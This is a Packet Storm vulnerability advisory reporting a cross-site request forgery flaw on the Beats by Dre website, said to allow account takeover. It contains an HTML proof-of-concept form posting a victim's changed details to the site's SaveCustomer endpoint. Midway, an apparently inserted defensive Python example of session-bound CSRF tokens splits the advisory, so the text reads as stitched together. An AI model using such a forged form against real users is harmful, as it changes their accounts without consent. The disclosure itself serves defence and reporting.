ID PACKETSTORM:138121 Type packetstorm Reporter Aaditya Purani Modified 2016-07-31T00:00:00
Description
Hello,
I am Aaditya Purani, and I found a CSRF (Cross Site Request Forgery)
on Beats by Dr. Dre which could lead to full account takeover and
information change by just sending a maliciously crafted link to the user.
Proof of Concept:
<html>
<!-- CSRF PoC - By Aaditya Purani -->
<body>
<form method="POST" action="https://www.beatsbydre.com/on/demandware.store/Sites-beats-Site/en_US/GigyaRAAS-SaveCustomer">
<input type="hidden" name="firstName" value="hacked" />
<input type="hidden" name="lastName" value="hackerone" />
<input type="hidden" name="emailAddress" value="victimsemail@gmail.com" />
<input type="hidden" name="zip" value="" />
<input type="hidden" name="phone" value="" />
<input type="hidden" name="csrf_token" value="VxM7k0ya2N1R69Ix9E3m/2165n60n2p399n38q6r1904o1po98r1snn323q0q/3Ex5Klu9mD1x5vMo91" />
<input type="hidden" name="isEmailSubscription" value="true" />
<input type="hidden" name="isAlreadySubscribed" value="false" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Response:
{"isCustomerSavedSuccessfully": true, "unsubscribeStatus": null} -> Attack successful
{"isCustomerSavedSuccessfully": false, "unsubscribeStatus": null} -> Attack unsuccessful
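The PoC above submits a hard-coded csrf_token in a cross-site POST. A replayed token can only succeed if the server ignores the token or accepts one that is not tied to the victim's own session (an inference from the PoC, not something the advisory states). The following is an added example, not Beats or Demandware code: a minimal synchronizer-token check in Python that mints one random token per session and accepts a state-changing request only when the submitted token matches the token stored for the session the request's cookie identifies. The session store, the save_customer stand-in for the SaveCustomer endpoint and all session ids and form data are constructed for the example.

```python
"""Session-bound CSRF token check (added example, not Beats/Demandware code).

Synchronizer-token pattern: every session gets its own random token, and a
state-changing request is accepted only if the submitted token equals the
token bound to the session the request's cookie identifies. A token copied
from a different session, or no token at all, is rejected.
All session ids, tokens and request data here are constructed in-memory.
"""
import hmac
import secrets
from typing import Dict, Optional

# Constructed server-side session store: session id -> session data.
SESSIONS: Dict[str, dict] = {}


def new_session() -> str:
    """Create a session and mint a fresh, random CSRF token for it."""
    sid = secrets.token_urlsafe(24)
    SESSIONS[sid] = {"csrf_token": secrets.token_urlsafe(32), "profile": {}}
    return sid


def csrf_token_for(sid: str) -> str:
    """Token the server would embed in the form it renders for this session."""
    return SESSIONS[sid]["csrf_token"]


def csrf_valid(sid: Optional[str], submitted: Optional[str]) -> bool:
    """True only if the submitted token equals the token bound to this session.

    hmac.compare_digest keeps the comparison constant-time, so the expected
    token cannot be inferred byte by byte from timing differences.
    """
    if sid is None or submitted is None:
        return False
    session = SESSIONS.get(sid)
    if session is None:
        return False
    return hmac.compare_digest(session["csrf_token"], submitted)


def save_customer(sid: Optional[str], form: dict) -> dict:
    """Hypothetical stand-in for a SaveCustomer-style endpoint.

    Returns the same response shape the advisory shows so the effect of the
    check is visible: the profile changes only when the token is valid.
    """
    if not csrf_valid(sid, form.get("csrf_token")):
        return {"isCustomerSavedSuccessfully": False, "unsubscribeStatus": None}
    profile = SESSIONS[sid]["profile"]
    for field in ("firstName", "lastName", "emailAddress"):
        if field in form:
            profile[field] = form[field]
    return {"isCustomerSavedSuccessfully": True, "unsubscribeStatus": None}


def demo() -> dict:
    """Walk through the three cases a defender wants to see."""
    victim = new_session()
    attacker = new_session()
    # Cross-site POST: the browser attaches the victim's cookie, but the token
    # in the form body was obtained from the attacker's *own* session.
    replayed = save_customer(victim, {"firstName": "x",
                                      "csrf_token": csrf_token_for(attacker)})
    # Cross-site POST carrying no token at all.
    missing = save_customer(victim, {"firstName": "x"})
    # Same-site form rendered for the victim carries the victim's own token.
    legit = save_customer(victim, {"firstName": "Alice",
                                   "csrf_token": csrf_token_for(victim)})
    return {"replayed": replayed["isCustomerSavedSuccessfully"],
            "missing": missing["isCustomerSavedSuccessfully"],
            "legit": legit["isCustomerSavedSuccessfully"],
            "profile": SESSIONS[victim]["profile"]}


if __name__ == "__main__":
    print(demo())
```

The design choice that matters is that the token is looked up from the server-side session, never taken from the request alone; a token that is valid for one session is worthless in another, which is exactly what a fixed value embedded in a cross-site form relies on not being true. In a real deployment the token would also be rotated on login and the cookie would carry SameSite=Lax or Strict as a second layer.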
Clicking on this link would change the details of any user. I have written a
complete blog post here:
https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/
Video PoC: https://youtu.be/2SfmmWxiDck
Apple has acknowledged me in their Hall of Fame:
https://support.apple.com/en-us/HT201536
*Timeline:*
October 8th 2015 - Reported
October 23rd 2015 - Triaged
November 6th 2015 - Responded that "Matter is being investigated"
January 18th 2016 - Fixed
June 20th 2016 - Acknowledged
Title Beats By Dre Cross Site Request Forgery
Href https://packetstormsecurity.com/files/138121/Beats-By-Dre-Cross-Site-Request-Forgery.html
SourceHref https://packetstormsecurity.com/files/download/138121/bbd-xsrf.txt